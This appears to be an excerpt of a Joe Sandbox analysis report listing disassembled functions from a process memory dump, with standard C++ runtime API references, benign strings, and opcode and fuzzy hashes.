Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1398ff00e3b7df8a6fb4d0ed87b77c7d342de88913bf179caf3e7fda7c5e50e4
Instruction ID: 356df03f667ad631790d12c9121dd8571854c8baaf276b43467a83f28928b1c1
Opcode Fuzzy Hash: 1398ff00e3b7df8a6fb4d0ed87b77c7d342de88913bf179caf3e7fda7c5e50e4
Instruction Fuzzy Hash: CCC08CB5000D008ECE2B8910C2B13A83365E3E3793F80248CC4020F643C61E9C86D660

Uniqueness

Uniqueness Score: -1.00%

Function 00395740 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0039574D
std::_Lockit::_Lockit.LIBCPMT ref: 00395767
std::_Lockit::~_Lockit.LIBCPMT ref: 00395788
std::_Lockit::~_Lockit.LIBCPMT ref: 003957B4
std::_Lockit::~_Lockit.LIBCPMT ref: 003957E9
std::_Lockit::_Lockit.LIBCPMT ref: 00395826
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00395877
__Getctype.LIBCPMT ref: 0039588E
std::_Facet_Register.LIBCPMT ref: 003958A7
std::_Lockit::~_Lockit.LIBCPMT ref: 003958C0

Strings

bad locale name, xrefs: 003958CF

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 1407599034-1405518554
Opcode ID: c903b8a3bc12778eb480e654a3e1f1029540066610357a4a6ababfaab251222a
Instruction ID: f106663afe04acba6b2cef997947cfa66b29b3e1b46b80fc093067771d361579
Opcode Fuzzy Hash: c903b8a3bc12778eb480e654a3e1f1029540066610357a4a6ababfaab251222a
Instruction Fuzzy Hash: 9FB1BD32A04A40CFDB13DF68C880B6AB7B0EF85724F26465DE959AB391D731ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00395AC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00395ACD
std::_Lockit::_Lockit.LIBCPMT ref: 00395AE7
std::_Lockit::~_Lockit.LIBCPMT ref: 00395B08
std::_Lockit::~_Lockit.LIBCPMT ref: 00395B34
std::_Lockit::~_Lockit.LIBCPMT ref: 00395B69
std::_Lockit::_Lockit.LIBCPMT ref: 00395BA6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00395BF7
std::_Facet_Register.LIBCPMT ref: 00395C16
std::_Lockit::~_Lockit.LIBCPMT ref: 00395C2F

Strings

bad locale name, xrefs: 00395C3E

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 3434717313-1405518554
Opcode ID: 8ce9ecafdaf0d19ae29e982d0460eff817f8389470b46d92f458c9f12866d9e0
Instruction ID: 61fcfa641bf72bb38b4390a0bc0fce5540a4f2bcd90ea14f250402acedf6732f
Opcode Fuzzy Hash: 8ce9ecafdaf0d19ae29e982d0460eff817f8389470b46d92f458c9f12866d9e0
Instruction Fuzzy Hash: 6041D3326083408FCB17DF18D890B9AFBE4EF90724F05085DF9899B291DB31E949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00395C50 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00395C5D
std::_Lockit::_Lockit.LIBCPMT ref: 00395C77
std::_Lockit::~_Lockit.LIBCPMT ref: 00395C98
std::_Lockit::~_Lockit.LIBCPMT ref: 00395CC4
std::_Lockit::~_Lockit.LIBCPMT ref: 00395CF9
std::_Lockit::_Lockit.LIBCPMT ref: 00395D36
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00395D87
std::_Facet_Register.LIBCPMT ref: 00395DA6
std::_Lockit::~_Lockit.LIBCPMT ref: 00395DBF

Strings

bad locale name, xrefs: 00395DCE

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 3434717313-1405518554
Opcode ID: c85a0eb52e39e9fef9d166d188645a5632e271333262a8772717d6cd1194bc8f
Instruction ID: 219fe239e716ba7d15bbb34d3328f4f349b2b82d74199aff0b74cd6e37de1d89
Opcode Fuzzy Hash: c85a0eb52e39e9fef9d166d188645a5632e271333262a8772717d6cd1194bc8f
Instruction Fuzzy Hash: B141C0316083408FCB13DF58D880B9AFBE4EF90714F05485DE9899B251DB71E949CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0039E5A8 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 303COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0039E6C7
___TypeMatch.LIBVCRUNTIME ref: 0039E7D5
CatchIt.LIBVCRUNTIME ref: 0039E826
_UnwindNestedFrames.LIBCMT ref: 0039E927
CallUnexpected.LIBVCRUNTIME ref: 0039E942

Strings

^, xrefs: 0039E947
csm, xrefs: 0039E6FE
csm, xrefs: 0039E5E5
csm, xrefs: 0039E652

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$^
API String ID: 4119006552-2293242563
Opcode ID: 195234d62b12b4a5fc2e43f813c1e589404afa4887f429a65405b2a374337e27
Instruction ID: ce59c7ed9018dc8de134be259663b7a614ad11398778b03c9f53b261f822e4c7
Opcode Fuzzy Hash: 195234d62b12b4a5fc2e43f813c1e589404afa4887f429a65405b2a374337e27
Instruction Fuzzy Hash: 0CB18C72C00219EFCF2AEFA4D8819AEBBB9FF14310F15445AE8116B212D731EA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00396D10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00396D20
std::_Lockit::_Lockit.LIBCPMT ref: 00396D3A
std::_Lockit::~_Lockit.LIBCPMT ref: 00396D5B
std::_Lockit::~_Lockit.LIBCPMT ref: 00396D8A
std::_Lockit::_Lockit.LIBCPMT ref: 00396DF1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00396E4E
__Getctype.LIBCPMT ref: 00396E65
std::_Facet_Register.LIBCPMT ref: 00396EAA

Strings

bad locale name, xrefs: 00396EC4

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 2622896957-1405518554
Opcode ID: e4424654a569afb2e9c2133a47a84412e524b20046640c35e276632588c007b8
Instruction ID: 60bf78fd69a6537dab84e36ce0798b8b1e7a622981ddc73a04307de2fd915036
Opcode Fuzzy Hash: e4424654a569afb2e9c2133a47a84412e524b20046640c35e276632588c007b8
Instruction Fuzzy Hash: D851E1319087808FDB23DF28C541B9AB7E4BF94310F15895CE5999B262EB30F948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00397360 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003973C1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00397416
Concurrency::cancel_current_task.LIBCPMT ref: 0039758E

Strings

., xrefs: 003974E3
false, xrefs: 003974B2
bad locale name, xrefs: 00397584
,, xrefs: 00397526
true, xrefs: 003974CC

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockitLockit::_
String ID: ,$.$bad locale name$false$true
API String ID: 1995332507-3659324578
Opcode ID: 0418c8b70042ce3cd1ac77f835c590f87a95e464b3347a9fdbd97db61a5ccfac
Instruction ID: c841e76418d8379c7adab4af7e5bbb43b889c51506a65029c7191845a86ecaa5
Opcode Fuzzy Hash: 0418c8b70042ce3cd1ac77f835c590f87a95e464b3347a9fdbd97db61a5ccfac
Instruction Fuzzy Hash: F8516DB18183859FD712DF64C841BABB7E4BF95304F044A2EF9889B281E775E548CB93

Uniqueness

Uniqueness Score: -1.00%

Function 003971D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00397222
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00397277
Concurrency::cancel_current_task.LIBCPMT ref: 00397341
Concurrency::cancel_current_task.LIBCPMT ref: 00397346
Concurrency::cancel_current_task.LIBCPMT ref: 0039734B

Strings

false, xrefs: 003972DF
bad locale name, xrefs: 00397337
true, xrefs: 00397305

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: e883b1f011b5371a594a5da83a2e884d3e598a69c5356adfde2a666bbf7f72e6
Instruction ID: ffc40834ef6e48340383cab97259c92883608130ee1a7986dc159110cec4366a
Opcode Fuzzy Hash: e883b1f011b5371a594a5da83a2e884d3e598a69c5356adfde2a666bbf7f72e6
Instruction Fuzzy Hash: BF419E781183409FDF22EF68C88179BBBE4AF85704F04492DF5999F282E7B5D509CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004A7F20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 496COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 004A8397
std::_Throw_Cpp_error.LIBCPMT ref: 004A83A8
std::_Throw_Cpp_error.LIBCPMT ref: 004A8434
std::_Throw_Cpp_error.LIBCPMT ref: 004A8445
std::_Throw_Cpp_error.LIBCPMT ref: 004A84FF
std::_Throw_Cpp_error.LIBCPMT ref: 004A8510

Strings

4oST, xrefs: 004A85A1

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID: 4oST
API String ID: 2134207285-3759581069
Opcode ID: 7f1deffdeaa2f32c6b6ba1bbcc8398b739a7cfc8825ed3f79597bf53310046c4
Instruction ID: 8fdc3fa6477e673c46371162ab93a0857ef24a664bd2bb2ba9bcb1788bf0a603
Opcode Fuzzy Hash: 7f1deffdeaa2f32c6b6ba1bbcc8398b739a7cfc8825ed3f79597bf53310046c4
Instruction Fuzzy Hash: D112EF70C00249DFDB10DFA8C945BAEBBB0FF26314F10425EE825AB391EB755A49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004A7F20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 496COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 004A8397
std::_Throw_Cpp_error.LIBCPMT ref: 004A83A8
std::_Throw_Cpp_error.LIBCPMT ref: 004A8434
std::_Throw_Cpp_error.LIBCPMT ref: 004A8445
std::_Throw_Cpp_error.LIBCPMT ref: 004A84FF
std::_Throw_Cpp_error.LIBCPMT ref: 004A8510

Strings

4oST, xrefs: 004A85A1

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID: 4oST
API String ID: 2134207285-3759581069
Opcode ID: 7f1deffdeaa2f32c6b6ba1bbcc8398b739a7cfc8825ed3f79597bf53310046c4
Instruction ID: 8fdc3fa6477e673c46371162ab93a0857ef24a664bd2bb2ba9bcb1788bf0a603
Opcode Fuzzy Hash: 7f1deffdeaa2f32c6b6ba1bbcc8398b739a7cfc8825ed3f79597bf53310046c4
Instruction Fuzzy Hash: D112EF70C00249DFDB10DFA8C945BAEBBB0FF26314F10425EE825AB391EB755A49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 003FBBB6 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

___TypeMatch.LIBVCRUNTIME ref: 003FBDE3
CatchIt.LIBVCRUNTIME ref: 003FBE34
_UnwindNestedFrames.LIBCMT ref: 003FBF35
CallUnexpected.LIBVCRUNTIME ref: 003FBF50

Strings

csm, xrefs: 003FBC60
csm, xrefs: 003FBBF3
csm, xrefs: 003FBD0C

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 944608866-393685449
Opcode ID: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction ID: d3e9ddc9d9ba7ab7b58088a56b626e0d37566da9f09260c1f475a7eb466a585e
Opcode Fuzzy Hash: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction Fuzzy Hash: EEB169B180020DEFCF16DFA4D9819BEFBB9FF14310B16416AEA146B212D735DA51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003FBBB6 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

___TypeMatch.LIBVCRUNTIME ref: 003FBDE3
CatchIt.LIBVCRUNTIME ref: 003FBE34
_UnwindNestedFrames.LIBCMT ref: 003FBF35
CallUnexpected.LIBVCRUNTIME ref: 003FBF50

Strings

csm, xrefs: 003FBD0C
csm, xrefs: 003FBC60
csm, xrefs: 003FBBF3

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 944608866-393685449
Opcode ID: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction ID: d3e9ddc9d9ba7ab7b58088a56b626e0d37566da9f09260c1f475a7eb466a585e
Opcode Fuzzy Hash: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction Fuzzy Hash: EEB169B180020DEFCF16DFA4D9819BEFBB9FF14310B16416AEA146B212D735DA51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003AC877 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

, xrefs: 003ACAF0

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 224dc6386f72dcd04963bfa6be44a9fae0621f81438ce20215c23ac2127ff780
Instruction ID: 9167f7c0e554bd768a84d2caf726b4843a78a99f2715fd2e7a8af7d56f10c4c1
Opcode Fuzzy Hash: 224dc6386f72dcd04963bfa6be44a9fae0621f81438ce20215c23ac2127ff780
Instruction Fuzzy Hash: 1AB11275A14209AFDB07DFACC881BAEBBB5EF47300F159159E500AB392C7719E42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF58 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0040FFDE

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
Instruction ID: 98007568401b8ea6ec545b56f13101d4932c1890a4451c934aea34c286558d9a
Opcode Fuzzy Hash: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
Instruction Fuzzy Hash: AAB12732904255AFDB218F64CC81BEF7BA5EF59310F144197E504AB382D2BD9DC1C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF58 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0040FFDE

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
